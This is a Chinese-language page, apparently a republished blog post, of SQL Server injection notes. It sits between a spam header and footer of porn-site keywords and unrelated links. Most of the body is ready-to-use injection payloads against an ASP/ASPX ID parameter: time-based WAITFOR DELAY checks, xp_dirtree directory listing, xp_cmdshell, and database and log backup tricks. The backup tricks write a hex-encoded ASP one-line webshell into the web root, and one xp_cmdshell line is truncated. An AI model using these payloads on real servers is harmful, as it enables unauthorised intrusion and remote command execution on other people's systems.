成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

SQL Server注入筆記

安全 數據安全
在一些大公司,通常都是使用mysql+php+apache的居多,對 Microsoft SQL Server 注入實戰相對就較少,平時在處理漏洞或者測試時,對于一些有學習價值的注入測試思路、sql語句都會文本備忘下,這里索性就將sql server注入筆記放上來,便于查詢。

 

在一些大公司,通常都是使用mysql+php+apache的居多,對Microsoft SQL Server 注入實戰相對就較少,平時在處理漏洞或者測試時,對于一些有學習價值的注入測試思路、sql語句都會文本備忘下,這里索性就將sql server注入筆記放上來,便于查詢。

在一些盲注中,尤其是沒有過多錯誤回顯信息的情況下,若語句執行成功就返回正常,若失敗就彈框提示“服務器連接超時”之類的錯誤提示,連爆表、爆字段的機會都沒有。最初,查詢db_owner、sysadmin、xp_cmdshell都是有權限的,如下所示:

 

 

但是,每次用sqlmqp的--sql-shell的功能執行insert總是失敗。后來直接在瀏覽器上測試insert語句發現執行失敗,可見sqlmap的sql-shell功能對語句是否執行功能的判斷還是比較有限的,啥也沒返回。

1、判斷注入大多是and 1=1之類的語句,也經常被過濾掉,這里備忘下sql server基于時間的注入判斷:

test.aspx?ID=300 WAITFOR DELAY '0:0:5'--

2、最初通過xp_regread讀取注冊表值來獲取web路徑:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots,但是返回為空,于是就采用下列方法遍歷C盤,并將結果寫入臨時表中(注意:在執行擴展存儲功能時,所創建的表段應于擴展存儲功能的參數相一致,否則會出錯!):

test.aspx?ID=300;CREATE TABLE TMP([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL);insert into tmp exec master..xp_dirtree 'c:/',1,1

用sqlmap把表TMP中的值跑出來:

比如站點主目錄位于默認路徑C:/inetpub/wwwroot,那么通過以下命令可寫入一句話木馬,其中的中括號前面需要使用^轉義:

test.aspx?ID=300;exec master..xp_cmdshell 'echo ^

test.asp?ID=300;backup database 數據庫名 to disk='c:/inetpub/wwwroot/d.asp' WITH DIFFERENTIAL,FORMAT;-- 只備份差異數據到asp文件中

或者通過log備份寫入:

test.asp?ID=300;alter database dbname set RECOVER FULL; 設置數據庫為完全恢復模式,以允許備份日志

test.asp?ID=300;create table cmd(a image);

test.asp?ID=300;backup log dbname do disk='c:\cmd' with init; 初始化日志

test.asp?ID=300;insert into cmd(a) values(0x3C25657865637574652872657175657374282261222929253E); 插入一句話木馬

test.asp?ID=300;backup log dbname to disk='c:/inetpub/wwwroot/d.asp';drop table cmd;-- 備份包含木馬的日志,并刪除創建表

責任編輯:藍雨淚 來源: 博客
相關推薦

2020-10-26 07:04:29

SQL注入mysql

2009-04-02 10:26:27

2010-12-20 16:04:30

2010-06-30 17:56:06

2017-08-10 10:23:59

2021-04-02 07:46:52

SQL Server數據庫知識筆記

2010-04-13 14:35:17

2011-08-11 14:23:57

SQL Server 索引分區

2011-08-22 11:23:41

SQL Server 數據修改

2021-03-19 07:12:23

SQL Server數據庫數據庫收縮

2021-03-24 14:50:00

SQLServer數據庫字符串

2011-08-25 14:25:50

SQL Server修改字段屬性

2020-09-28 09:30:13

mybatis

2010-09-27 11:17:31

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2009-04-10 15:37:48

SQL Server2鏡像實施

2011-08-19 15:29:10

SQL Server 元數組

2014-11-04 13:43:10

2009-11-02 13:47:09

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲精品第一 | 在线观看亚洲专区 | 九九热最新视频 | 在线国产视频观看 | 精品无码久久久久国产 | 亚洲高清成人在线 | 羞羞视频网站在线观看 | 先锋av资源在线 | 永久免费视频 | 91国内精精品久久久久久婷婷 | 午夜影院污 | 国产精品美女久久久久久久网站 | 一区二区三区中文字幕 | 视频国产一区 | 福利社午夜影院 | 欧美精品国产一区二区 | jlzzxxxx18hd护士| 99热国产精品 | 国产精品欧美一区二区 | 精品福利视频一区二区三区 | 九九热精品免费 | 日韩av免费在线观看 | 国产精品夜间视频香蕉 | 日韩影院在线观看 | 国产精品美女久久久久久免费 | 久久国产精品72免费观看 | 91一区二区三区在线观看 | 男女一区二区三区 | 成人av播放 | 精品一区二区三区四区五区 | 精品不卡| 久久男人 | 国产激情网 | 国产二区av| 国产精品成人在线观看 | 免费观看毛片 | 中文字幕中文字幕 | 午夜在线影院 | 亚洲欧美中文日韩在线v日本 | 成人在线a| 另类亚洲视频 |